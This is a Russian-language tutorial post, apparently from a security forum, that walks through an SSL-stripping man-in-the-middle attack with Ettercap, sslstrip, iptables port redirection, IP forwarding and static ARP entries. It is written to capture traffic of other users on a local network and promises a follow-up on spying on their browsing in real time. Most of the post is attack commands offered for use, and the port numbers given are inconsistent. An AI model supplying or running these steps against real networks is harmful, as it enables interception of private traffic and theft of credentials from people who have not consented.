Спонсор публикаций Marketplace codeby

Сервис, который так долго ждали. При расчетах используем биткоин. Первому продавцу бесплатная реклама: Консультация на тему ИБ от Ondrik8

unnamed

Как и было мною обещано сейчас я расскажу вам как подменить тип шифрования дабы Ettercap смог понять что он отобрал для нас и не выкинул эту инфу.

Как раз для этого мы используем в тондеме с Ettercap(И его модулем mitm) новую програмку Ssl_Strip и IPtables.

Ssl_Strip как и IPtables не имеют графического интерфейса и по этому обычные пользователи предпочитают их не замечать, но мы не обычные,уже…

Настраиваем IPtables для перенаправления интернет трафика. С 80 порта на любой другой, у меня это 5050 порт :
iptables -t nat -A PREROUTING -p tcp —destination-port 80 -j REDIRECT —to-port 5050

Ну а теперь врубаем SSLstrip sslstrip -l  5050

Включаем форвардинг ip-forwarding пакетов:
echo «1» > /proc/sys/net/ipv4/ip_forward

Запускаем SSLstrip на просушку заданного нами порта:
sslstrip -l 8080
Убедитесь что вы не запустили через этот порт и другие «программы для поиска уезвимостей своих интернет сетей»

Создаем статический маршрут.
Два варианта:
Первый Вариант
arp -s 192.168.1.1 xx-xx-xx-xx-xx-xx

Второй вариант
Если первый не сработал то вот второй вариант:
netsh interface ipv4 add neighbors «Подключение по локальной сети» «192.168.1.1» «xx-x-xx-xx-xx-xx»

Ettercap

В следующей части я научу вас подсматривать за тем на какие сайты заходит пользователь в реальном времени

Похожие темы

Morpheus — автоматизированный инструмент зах... Автоматизированный инструмент захвата ettercap TCP / IP: Morpheus Фреймворк morpheus автоматизирует задачи управления пакетами tcp/udp с помощь...
Метод заражения корпоративной сети... Новая статья, новый взгляд, норвые подробности. Браво мистер Ondrik8 ! Здравствуйте, на сей раз хочу поделится с вами личным (свинским) методом зар...
Apple выпустила обновления безопасности для iOS и ... Apple выпустила обновления безопасности для iOS устройств и Apple TV направленное на множество уязвимостей, одна из которых может позволить атакующе...
Parrot Security OS Теперь на "Psyhocode.com" будет серия уроков "Parrot Security OS". В связи с тем, что видео и текстовых мануало на русском об "Kali Linux" очень мног...
Как отключить SSL 3 на своём сервере... Как защитить пользователям себя от уязвимости SSL 3.0 codeby.net уже писал. Вы можете проверить, подвержены ли вы этой уязвимости перейдя на эт...